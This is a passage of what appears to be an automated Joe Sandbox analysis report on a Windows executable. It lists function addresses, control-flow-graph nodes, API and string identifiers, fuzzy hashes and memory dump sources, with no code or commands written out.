                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                                                                                                                                        • String ID: PNG
                                                                                                                                                                                                                                                        • API String ID: 3656887471-364855578
                                                                                                                                                                                                                                                        • Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                        • Instruction ID: c9e8e156ce8c914cd0a60792777701238377548d8cb1cab9ca4b157f8790f292
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68412422B09B4681EF198B26D894379A3A0EF44BD4F287435CE0DC7794EF7EE4458790
                                                                                                                                                                                                                                                        Function 00007FF60638647C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2248 7ff60638647c-7ff6063864b3 2249 7ff6063864b9-7ff6063864c1 2248->2249 2250 7ff606386592-7ff60638659f FindNextFileW 2248->2250 2251 7ff6063864c6-7ff6063864d8 FindFirstFileW 2249->2251 2252 7ff6063864c3 2249->2252 2253 7ff6063865b3-7ff6063865b6 2250->2253 2254 7ff6063865a1-7ff6063865b1 GetLastError 2250->2254 2251->2253 2255 7ff6063864de-7ff606386506 call 7ff6063880b0 2251->2255 2252->2251 2257 7ff6063865b8-7ff6063865c0 2253->2257 2258 7ff6063865d1-7ff606386613 call 7ff6063aaf0c call 7ff6063812bc call 7ff606388dc4 2253->2258 2256 7ff60638658a-7ff60638658d 2254->2256 2268 7ff606386508-7ff606386524 FindFirstFileW 2255->2268 2269 7ff606386527-7ff606386530 2255->2269 2259 7ff6063866ab-7ff6063866ce call 7ff6063a5c30 2256->2259 2261 7ff6063865c5-7ff6063865cc call 7ff606381c80 2257->2261 2262 7ff6063865c2 2257->2262 2284 7ff60638664c-7ff6063866a6 call 7ff60638e904 * 3 2258->2284 2285 7ff606386615-7ff60638662c 2258->2285 2261->2258 2262->2261 2268->2269 2272 7ff606386569-7ff60638656d 2269->2272 2273 7ff606386532-7ff606386549 2269->2273 2272->2253 2277 7ff60638656f-7ff60638657e GetLastError 2272->2277 2275 7ff60638654b-7ff60638655e 2273->2275 2276 7ff606386564 call 7ff6063a5b1c 2273->2276 2275->2276 2279 7ff6063866d5-7ff6063866db call 7ff6063aae94 2275->2279 2276->2272 2281 7ff606386588 2277->2281 2282 7ff606386580-7ff606386586 2277->2282 2281->2256 2282->2256 2282->2281 2284->2259 2287 7ff606386647 call 7ff6063a5b1c 2285->2287 2288 7ff60638662e-7ff606386641 2285->2288 2287->2284 2288->2287 2291 7ff6063866cf-7ff6063866d4 call 7ff6063aae94 2288->2291 2291->2279
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 474548282-0
                                                                                                                                                                                                                                                        • Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                        • Instruction ID: a7620bd8a13c4c5cd0ea0e076189c23a7cad35b26baca7282a209aacdd6d14a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B261E472A08B8685DE188B24E4412BD6361FB857B4F606331EABDC36E9DF7DD544C780
                                                                                                                                                                                                                                                        Function 00007FF60639569C Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: c
                                                                                                                                                                                                                                                        • API String ID: 0-112844655
                                                                                                                                                                                                                                                        • Opcode ID: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                                                                                                                                                                                                                                        • Instruction ID: 3a35b45424afca52b95a3cb2d6bb46e4a85890db3d0a03ff1d8eec10fc120ffd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90E1E533A186818BE719CF29D4802AD77A1F78875CF209139DA5993B88DF3DE981CF50
                                                                                                                                                                                                                                                        Function 00007FF606396294 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5b628a92f811a5eae6f4b0ca0e3bf09709b45c566e4e75254577d1b926f4d6b6
                                                                                                                                                                                                                                                        • Instruction ID: a982e3c7dddab81b7ab5a77e8f2621a5a8a2806f541af097abcdcd5df014c63f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b628a92f811a5eae6f4b0ca0e3bf09709b45c566e4e75254577d1b926f4d6b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E222E372E0EA5282FA2C8F14985117DA690FF4275CF392135DA5DD76D4EE3FE8018BA0
                                                                                                                                                                                                                                                        Function 00007FF6063A5390 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1728 7ff6063a5390-7ff6063a5419 call 7ff6063a4fe8 1731 7ff6063a5444-7ff6063a5461 1728->1731 1732 7ff6063a541b-7ff6063a543f call 7ff6063a52f8 RaiseException 1728->1732 1734 7ff6063a5463-7ff6063a5474 1731->1734 1735 7ff6063a5476-7ff6063a547a 1731->1735 1738 7ff6063a5648-7ff6063a5665 1732->1738 1737 7ff6063a547d-7ff6063a5489 1734->1737 1735->1737 1739 7ff6063a548b-7ff6063a549d 1737->1739 1740 7ff6063a54aa-7ff6063a54ad 1737->1740 1750 7ff6063a54a3 1739->1750 1751 7ff6063a5619-7ff6063a5623 1739->1751 1741 7ff6063a54b3-7ff6063a54b6 1740->1741 1742 7ff6063a5554-7ff6063a555b 1740->1742 1746 7ff6063a54b8-7ff6063a54cb 1741->1746 1747 7ff6063a54cd-7ff6063a54e2 LoadLibraryExA 1741->1747 1744 7ff6063a556f-7ff6063a5572 1742->1744 1745 7ff6063a555d-7ff6063a556c 1742->1745 1752 7ff6063a5615 1744->1752 1753 7ff6063a5578-7ff6063a557c 1744->1753 1745->1744 1746->1747 1749 7ff6063a5539-7ff6063a5542 1746->1749 1748 7ff6063a54e4-7ff6063a54f7 GetLastError 1747->1748 1747->1749 1756 7ff6063a550e-7ff6063a5534 call 7ff6063a52f8 RaiseException 1748->1756 1757 7ff6063a54f9-7ff6063a550c 1748->1757 1760 7ff6063a5544-7ff6063a5547 FreeLibrary 1749->1760 1761 7ff6063a554d 1749->1761 1750->1740 1758 7ff6063a5640 call 7ff6063a52f8 1751->1758 1759 7ff6063a5625-7ff6063a5636 1751->1759 1752->1751 1754 7ff6063a557e-7ff6063a5582 1753->1754 1755 7ff6063a55ab-7ff6063a55be GetProcAddress 1753->1755 1754->1755 1764 7ff6063a5584-7ff6063a558f 1754->1764 1755->1752 1767 7ff6063a55c0-7ff6063a55d3 GetLastError 1755->1767 1756->1738 1757->1749 1757->1756 1770 7ff6063a5645 1758->1770 1759->1758 1760->1761 1761->1742 1764->1755 1768 7ff6063a5591-7ff6063a5598 1764->1768 1772 7ff6063a55d5-7ff6063a55e8 1767->1772 1773 7ff6063a55ea-7ff6063a5611 call 7ff6063a52f8 RaiseException call 7ff6063a4fe8 1767->1773 1768->1755 1774 7ff6063a559a-7ff6063a559f 1768->1774 1770->1738 1772->1752 1772->1773 1773->1752 1774->1755 1776 7ff6063a55a1-7ff6063a55a9 1774->1776 1776->1752 1776->1755
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 282135826-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                        • Instruction ID: 90f4469d9f6513964bfd329cb6311fa1feb75fc735307b3bfc2d42dc76d02091
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F916A32A15B528AEF08CF65D8442AC73B1BF08798B646435DE0E97B54EF3AE444C780
                                                                                                                                                                                                                                                        Function 00007FF606389CDC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606389254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF606389389
                                                                                                                                                                                                                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60638A375
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60638A82F
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60638A835
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF606389CBA), ref: 00007FF606390369
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                                                                        • API String ID: 3629253777-3268106645
                                                                                                                                                                                                                                                        • Opcode ID: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                                                                                                                                                                                                                                        • Instruction ID: 6ab9c136574e5b3c09c002c848b8b64eea10003c288a2f43579b0ec66599e006
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E62C362A1978299EB18DF28D4442FD6361FF40784FA06132DA4DC7AE5EFBEE545C380
                                                                                                                                                                                                                                                        Function 00007FF6063A3030 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2118 7ff6063a3030-7ff6063a3073 2119 7ff6063a33e4-7ff6063a3409 call 7ff606381b70 call 7ff6063a5c30 2118->2119 2120 7ff6063a3079-7ff6063a30b5 call 7ff6063a74c0 2118->2120 2126 7ff6063a30b7 2120->2126 2127 7ff6063a30ba-7ff6063a30c1 2120->2127 2126->2127 2129 7ff6063a30c3-7ff6063a30c7 2127->2129 2130 7ff6063a30d2-7ff6063a30d6 2127->2130 2131 7ff6063a30c9 2129->2131 2132 7ff6063a30cc-7ff6063a30d0 2129->2132 2133 7ff6063a30d8 2130->2133 2134 7ff6063a30db-7ff6063a30e6 2130->2134 2131->2132 2132->2134 2133->2134 2135 7ff6063a3178 2134->2135 2136 7ff6063a30ec 2134->2136 2138 7ff6063a317c-7ff6063a317f 2135->2138 2137 7ff6063a30f2-7ff6063a30f9 2136->2137 2139 7ff6063a30fe-7ff6063a3103 2137->2139 2140 7ff6063a30fb 2137->2140 2141 7ff6063a3181-7ff6063a3185 2138->2141 2142 7ff6063a3187-7ff6063a318a 2138->2142 2143 7ff6063a3135-7ff6063a3140 2139->2143 2144 7ff6063a3105 2139->2144 2140->2139 2141->2142 2145 7ff6063a31b0-7ff6063a31c3 call 7ff606387b68 2141->2145 2142->2145 2146 7ff6063a318c-7ff6063a3193 2142->2146 2150 7ff6063a3142 2143->2150 2151 7ff6063a3145-7ff6063a314a 2143->2151 2147 7ff6063a311a-7ff6063a3120 2144->2147 2163 7ff6063a31c5-7ff6063a31e3 call 7ff606390aa0 2145->2163 2164 7ff6063a31e8-7ff6063a323d call 7ff6063aaf0c call 7ff6063812bc call 7ff60638587c call 7ff606381b70 2145->2164 2146->2145 2148 7ff6063a3195-7ff6063a31ac 2146->2148 2154 7ff6063a3122 2147->2154 2155 7ff6063a3107-7ff6063a310e 2147->2155 2148->2145 2150->2151 2152 7ff6063a3150-7ff6063a3157 2151->2152 2153 7ff6063a340a-7ff6063a3411 2151->2153 2157 7ff6063a3159 2152->2157 2158 7ff6063a315c-7ff6063a3162 2152->2158 2161 7ff6063a3413 2153->2161 2162 7ff6063a3416-7ff6063a341b 2153->2162 2154->2143 2159 7ff6063a3110 2155->2159 2160 7ff6063a3113-7ff6063a3118 2155->2160 2157->2158 2158->2153 2166 7ff6063a3168-7ff6063a3172 2158->2166 2159->2160 2160->2147 2167 7ff6063a3124-7ff6063a312b 2160->2167 2161->2162 2168 7ff6063a342e-7ff6063a3436 2162->2168 2169 7ff6063a341d-7ff6063a3424 2162->2169 2163->2164 2185 7ff6063a323f-7ff6063a328d call 7ff6063aaf0c call 7ff6063812bc call 7ff6063872ac call 7ff606381b70 2164->2185 2186 7ff6063a3292-7ff6063a329f ShellExecuteExW 2164->2186 2166->2135 2166->2137 2172 7ff6063a3130 2167->2172 2173 7ff6063a312d 2167->2173 2176 7ff6063a3438 2168->2176 2177 7ff6063a343b-7ff6063a3446 2168->2177 2174 7ff6063a3426 2169->2174 2175 7ff6063a3429 2169->2175 2172->2143 2173->2172 2174->2175 2175->2168 2176->2177 2177->2138 2185->2186 2187 7ff6063a32a5-7ff6063a32af 2186->2187 2188 7ff6063a3396-7ff6063a339e 2186->2188 2190 7ff6063a32bf-7ff6063a32c2 2187->2190 2191 7ff6063a32b1-7ff6063a32b4 2187->2191 2193 7ff6063a33a0-7ff6063a33b6 2188->2193 2194 7ff6063a33d2-7ff6063a33df 2188->2194 2196 7ff6063a32de-7ff6063a32fd call 7ff6063ef130 call 7ff6063a3928 2190->2196 2197 7ff6063a32c4-7ff6063a32cf call 7ff6063ef138 2190->2197 2191->2190 2195 7ff6063a32b6-7ff6063a32bd 2191->2195 2199 7ff6063a33b8-7ff6063a33cb 2193->2199 2200 7ff6063a33cd call 7ff6063a5b1c 2193->2200 2194->2119 2195->2190 2203 7ff6063a3333-7ff6063a3340 CloseHandle 2195->2203 2196->2203 2225 7ff6063a32ff-7ff6063a3302 2196->2225 2197->2196 2217 7ff6063a32d1-7ff6063a32dc ShowWindow 2197->2217 2199->2200 2201 7ff6063a344b-7ff6063a3453 call 7ff6063aae94 2199->2201 2200->2194 2208 7ff6063a3342-7ff6063a3353 call 7ff606390aa0 2203->2208 2209 7ff6063a3355-7ff6063a335c 2203->2209 2208->2209 2215 7ff6063a337e-7ff6063a3380 2208->2215 2209->2215 2216 7ff6063a335e-7ff6063a3361 2209->2216 2215->2188 2223 7ff6063a3382-7ff6063a3385 2215->2223 2216->2215 2222 7ff6063a3363-7ff6063a3378 2216->2222 2217->2196 2222->2215 2223->2188 2227 7ff6063a3387-7ff6063a3395 ShowWindow 2223->2227 2225->2203 2228 7ff6063a3304-7ff6063a3315 GetExitCodeProcess 2225->2228 2227->2188 2228->2203 2229 7ff6063a3317-7ff6063a332c 2228->2229 2229->2203
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                                                                        • API String ID: 1054546013-3607691742
                                                                                                                                                                                                                                                        • Opcode ID: 0ccde82e90eecccb9c1d6a00cceea7fcf12badbd4a71c34f7908ccaf6dc484b3
                                                                                                                                                                                                                                                        • Instruction ID: ae0e25b321813ba588994620b1ae76e8de0ab2930e1c4ddece79128023b88900
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ccde82e90eecccb9c1d6a00cceea7fcf12badbd4a71c34f7908ccaf6dc484b3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FC18B32B1CA4285FF18DB65D9442BD23B1AF85B80F246035DA4EC77A4EF3EE8559380
                                                                                                                                                                                                                                                        Function 00007FF6063A2BF4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3569833718-0
                                                                                                                                                                                                                                                        • Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                                                                                                        • Instruction ID: 8ee37c24c70e951bd7dcd70a3b106c9263debc331fd25d92991911ede0315f5e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A411539B1468246F718CF61E800BAE3360EB45B98F646135DD0A87BD4CF7FD9458790
                                                                                                                                                                                                                                                        Function 00007FF60639218C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 7COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2245 7ff60639218c-7ff60639219f call 7ff6063a57cc
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                        • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                                                                                                        • API String ID: 909987262-704999473
                                                                                                                                                                                                                                                        • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                        • Instruction ID: cd2dd3422bb912572d3d824fd08a2ee0ea4f45db9e6a78f0ab80b0db309bc594
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10B0122890450EC0D43CA7808C450A40310CB54700FB03C30C31CCFC520D3EB0424243
                                                                                                                                                                                                                                                        Function 00007FF6063846A0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
